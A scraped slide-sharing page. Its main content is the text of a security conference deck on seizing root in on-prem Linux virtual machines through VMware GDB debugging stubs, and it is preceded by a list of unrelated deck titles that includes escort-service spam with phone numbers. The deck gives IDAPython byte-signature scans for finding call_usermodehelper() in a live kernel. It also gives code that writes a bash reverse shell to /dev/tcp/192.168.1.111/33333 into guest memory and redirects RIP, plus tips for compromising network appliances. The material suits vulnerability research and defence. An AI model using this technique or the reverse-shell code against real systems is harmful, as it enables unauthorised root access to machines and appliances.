Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.ppt
 
What are the features of Vehicle Tracking System?
What are the features of Vehicle Tracking System?What are the features of Vehicle Tracking System?
What are the features of Vehicle Tracking System?
 
why an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfwhy an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdf
 
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with Azure
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered Sustainability
 
Engage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyEngage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The Ugly
 
Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
 
buds n tech IT solutions
buds n tech IT solutionsbuds n tech IT solutions
buds n tech IT solutions
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need It
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)
 
cybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningcybersecurity notes for mca students for learning
cybersecurity notes for mca students for learning
 

0x01 - Breaking into Linux VMs for Fun and Profit.pdf

  • 1. Breaking into Linux VMs For Fun and Profit Russell Sanford xort @ sploit.online
  • 2. 0x01 • I Originally created this technique in 2016 and did a talk called… Compromising Linux Virtual Machines with Debugging Mechanisms (slideshare .net) https://www.slideshare.net/xort/compromising-linux-virtual-machines-with-debugging-mechanisms This technique allows you to seize control of a (on-prem) Linux Virtual Machine and spawn a connect back root shell from kernel land. (Ring0 -> Ring3 -> Us) Machines relying on LUKs boot-key encryption are not secure and access to their appliances code base can be audited for vulnerabilities. Breaking Into Linux VMs for Fun and Profit
  • 3. 0x02 This attack opened the door to finding >30 Remote Root (auth and pre- auth) vulnerabilities in security vendor’s products (Citrix, Sophos, Barracuda, Bluecoat, Sonicwall, etc…) Made me > $20k in bug bounties ( the ‘profit’ :D ) Got me up to #107 on bugcrowd’s ~50k signed up researchers Breaking Into Linux VMs for Fun and Profit
  • 4. 0x03 Vmware added GDB Plugs to their products allowing for OS developers to diagnose code in their Virtual Machines. I adapted methodology used in UNIX Ptrace styled attacks to see what fun could be had… Breaking Into Linux VMs for Fun and Profit So What Brought this on…
  • 5. 0x04 Breaking Into Linux VMs for Fun and Profit int call_usermodehelper ( const char * path, char ** argv, char ** envp, int wait); Name call_usermodehelper — prepare and start a usermode application Synopsis (FROM KERNEL LAND) Were starting off in Kernel Land… This allows us to go from RING 0 (kernel) to RING3 (userland) Where we can launch our attack. :D
  • 6. 0x05 Breaking Into Linux VMs for Fun and Profit Finding Bytes Signatures… To find Pathways to API Locate SIMILAR sections of code from multiple target’s using unique assembly sequences Compare bytes and find sections with gaps of indifference that realign later in the code for more unique samples
  • 7. 0x06 Breaking Into Linux VMs for Fun and Profit Configuring IDA PRO And VMware to have some fun…
  • 8. 0x07 • VMware Workstation >= 5.0 • VMware Player >= 3.0 • Fusion • Allow RWX of memory, ability to single-step, etc @ kernel level • When attaching to a Linux VM we land in native_safe_halt() Breaking Into Linux VMs for Fun and Profit VMWARE GDB STUBS
  • 9. 0x08 Breaking Into Linux VMs for Fun and Profit Configuring IDA Pro to connect to Vmware GDB server
  • 10. 0x09 Breaking Into Linux VMs for Fun and Profit Configuring IDA Pro to connect to Vmware GDB server
  • 11. 0x0A Breaking Into Linux VMs for Fun and Profit Configuring IDA Pro to connect to Vmware GDB server
  • 12. 0x0B ORIGINAL ATTACK (2016) Breaking Into Linux VMs for Fun and Profit
  • 13. 0x0C Breaking Into Linux VMs for Fun and Profit ORIGINAL ATTACK (2016)
  • 14. 0x0D Breaking Into Linux VMs for Fun and Profit THE REVISED ATTACK (2023) API Identification… THE PROBLEM: The Old Way was slow and would sometimes fail with debugging over a network… I needed to come up with a solution to find call_usermodehelper() API in a quicker and more elegant way. THE SOLUTION: Instead of one large sweep of memory looking for a single byte signature… I would analyze the kernel and write a routine to find functions that called into functions, that would call into functions, that would call into functions (3 layers deep) and end up at an address CLOSE ( 0xFFFFFFFFF0000 range) to call_usermodehelper() From Here, a final memory fingerprint byte scan is done to identify call_usermodehelper()
  • 15. 0x0E Breaking Into Linux VMs for Fun and Profit THE REVISED ATTACK (2023) API Pathway Identification Map Routine (Searches 4 Levels Deep in Code XREFs) for an address close to call_usermodehelper()
  • 16. 0x0F Breaking Into Linux VMs for Fun and Profit
  • 17. 0x10 • THE REVISED ATTACK (2023) Shellcode? Who needs Shellcode… :D …..Not Us. • We change RIP to call_usermodehelp()’s entry point and set register values to ARGV[] data we store backwards in stack • When it reaches the end of the function – it returns to what native_safe_halt() would have and it’s as if we never made a change • Return of execution is smoothly given back to the OS – but our shell has been spawned. :D Breaking Into Linux VMs for Fun and Profit
  • 18. 0x11 • THE REVISED ATTACK (2023) Breaking Into Linux VMs for Fun and Profit We Change RIP from native_safe_halt() to call_usermodehelper() without any patches to the code. Call_usermodehelper() will cleanly exit ounce our shell is spawned by returning to where native_safe_halt() was supposed to
  • 19. 0x12 Breaking Into Linux VMs for Fun and Profit THE REVISED ATTACK (2023) 1) API Identification through: A) 1st Round - Memory Signature scan to find Code Xref’ed to… B) Extracting Pointer from CALL instruction ( and calculating 2’s compliment offset) C) 2nd Round – Memory Signature scan to find Code Xref’ed to… D) Extracting Pointer from CALL instruction ( and calculating 2’s compliment offset) E) 3rd Round – Memory Scanning for call_usermodehelper()’s API address 2) Backing up Machine State - Register Values and Memory Area to be used for executing Shellcode (current RIP address) 3) Creating ARGV[] data somewhere back in the Stack 4) Restoring Machine State – Restoring Register Values – Setting RIP back – Patching back memory we overwrote to execute Shellcode
  • 20. 0x13 Breaking Into Linux VMs for Fun and Profit The path to call_usermodehelper() …
  • 21. 0x14 Breaking Into Linux VMs for Fun and Profit We start in native_safe_halt() … Scan Up in Memory for acpi_os_unmap_iomem() Using byte signature pattern: 48 B9 22 01 00 00 00 00 AD DE ... acpi_os_unmap_iomem_sig = "48 B9 22 01 00 00 00 00 AD DE” sig_addr = idc.find_binary(addr, SEARCH_UP, acpi_os_unmap_iomem_sig)
  • 22. 0x15 Breaking Into Linux VMs for Fun and Profit acpi_os_unmap_iomem() we find a CALL to queue_rcu_work() which we extract the destinations API from the CALL instruction which is located 0x2d bytes from our byte signature offset_to_queue_rcu_work = ctypes.c_long(unpack("<L", get_bytes((sig_addr + 0x2d),4,0))[0]).value
  • 23. 0x16 Breaking Into Linux VMs for Fun and Profit queue_rcu_work() resides close to call_usermodehelper() in memory … call_usermodehelper_sig = "55 83 F9 01 48 89 E5 41 56 41 89 CE 41 55 49 89 FD“ sig_addr = idc.find_binary(queue_rcu_work_address, SEARCH_UP, call_usermodehelper_sig) We Search up for the binary pattern: 55 83 F9 01 48 89 E5 41 56 41 89 CE 41 55 49 89 FD to find it.
  • 24. 0x17 Breaking Into Linux VMs for Fun and Profit ARGV in Memory… • Top area is set aside to hold QWORD of pointers to strings used in ARGV array • Ends with NULL (Qword) to signify end of array • Bottom area will hold actual string data
  • 25. 0x18 Breaking Into Linux VMs for Fun and Profit con_back_ip = "192.168.1.111" con_back_port = "33333" command_to_execute = "bash -i >& /dev/tcp/" + con_back_ip + "/" + con_back_port + " 0>&1“ # CMD in memory for ARGV... cmd_runner_prefix = b"/bin/bashx00-cx00“ # payload / command to execute location = get_reg_value("rsp") - 0x1000 location2= get_reg_value("rsp") - 0x1100 idaapi.dbg_write_memory(location, (cmd_runner_prefix + command_to_execute.encode('latin-1')) + b"x00" ) set_reg_value(location, "rdi") # RDI = program to execute # RSI = construct argv[] idaapi.dbg_write_memory(location2, pack("<Q", location)) # program name and start of argv idaapi.dbg_write_memory(location2+8, pack("<Q", location+10)) idaapi.dbg_write_memory(location2+16, pack("<Q", location+13)) idaapi.dbg_write_memory(location2+24, pack("<Q", 0x0)) # end of argv[] set_reg_value(location2, "rsi") # RSI = argv[] set_reg_value(0x0, "rdx") # RDX = envp[] (null) set_reg_value( call_usermodehelper , "rip") # RIP to call_usermodehelper()
  • 26. 0x19 Breaking Into Linux VMs for Fun and Profit Exploit in action… Root Shell 
  • 27. 0x17 Breaking Into Linux VMs for Fun and Profit The do_coredump() method Universal Unlock Method for ALL 5x 6x Kernels ( also… much slower :D ! Go grab food and wait! )
  • 28. 0x1A Breaking Into Linux VMs for Fun and Profit When we attach to a running Linux kernel using GDB stubs, we land in a call to native_safe_halt(). This is where our journey begins… :D
  • 29. 0x1B Breaking Into Linux VMs for Fun and Profit do_coredump_sig1 = "BA 00 02 00 00 BE C0 0C 00 00 E8 ?? ?? ?? ?? 48 85 C0“ sig_addr = idc.find_binary(addr, SEARCH_UP, do_coredump_sig1) We Search up for the binary pattern: BA 00 02 00 00 BE C0 0C 00 00 E8 ?? ?? ?? ?? 48 85 C0 to land in do_coredump()
  • 30. 0x1C Breaking Into Linux VMs for Fun and Profit do_coredump_sig2 = "50 49 8B“ sig_addr = idc.find_binary(sig_addr, SEARCH_UP, do_coredump_sig2) We Search up for the binary pattern: 50 49 8B to land the call to call_usermodehelper_setup() near by…
  • 31. 0x1D Breaking Into Linux VMs for Fun and Profit do_coredump_sig3 = "E8 ?? ?? ?? ?? 44 8b“ sig_addr = idc.find_binary(sig_addr, SEARCH_DOWN, do_coredump_sig3) call_usermodehelper_setup = (sig_addr+1) + ctypes.c_long(unpack("<L", get_bytes((sig_addr + 0x1),4,0))[0]).value We Search down for the binary pattern: E8 ?? ?? ?? ?? 44 8b to find actual address reference
  • 32. 0x1E Breaking Into Linux VMs for Fun and Profit We dereference address of call_usermodehelper_setup() knowing call_usermodehelper() is near by Just bytes below in a following function declaration…. VERY CLOSE NOW! :D
  • 33. 0x1F Breaking Into Linux VMs for Fun and Profit call_usermodehelper_sig1 = "81 E6 60 ?? FF FF 48 89 D3 BA ?? 00 00 00 81 C6 C0 0D 00 00“ sig_addr = idc.find_binary(call_usermodehelper_setup, SEARCH_DOWN, call_usermodehelper_sig1) We Search down for the binary pattern: 81 E6 60 ?? FF FF 48 89 D3 BA ?? 00 00 00 81 C6 C0 0D 00 00 to land in call_usermodehelper() …
  • 34. 0x20 Breaking Into Linux VMs for Fun and Profit call_usermodehelper_sig2 = "E8 ?? ?? ?? ?? 55 83 F9 01“ call_usermodehelper = idc.find_binary(sig_addr, SEARCH_UP, call_usermodehelper_sig2) Lastly, we search up to find the beginning bytes of the function: call_usermodehelper() … GAME TIME! :D
  • 35. 0x21 Breaking Into Linux VMs for Fun and Profit The path to call_usermodehelper() using the do_coredump() route/method…
  • 36. 0x22 Breaking Into Linux VMs for Fun and Profit Root Shell 
  • 37. 0x23 Breaking Into Linux VMs for Fun and Profit Tips for compromising Network Appliances: • Prelude payload with call to Drop IPTABLES • Try adding a serial connection and using a serial connect back 1-liner
  • 38. 0x24 Breaking Into Linux VMs for Fun and Profit Thanks! Russell Sanford xort@sploit.online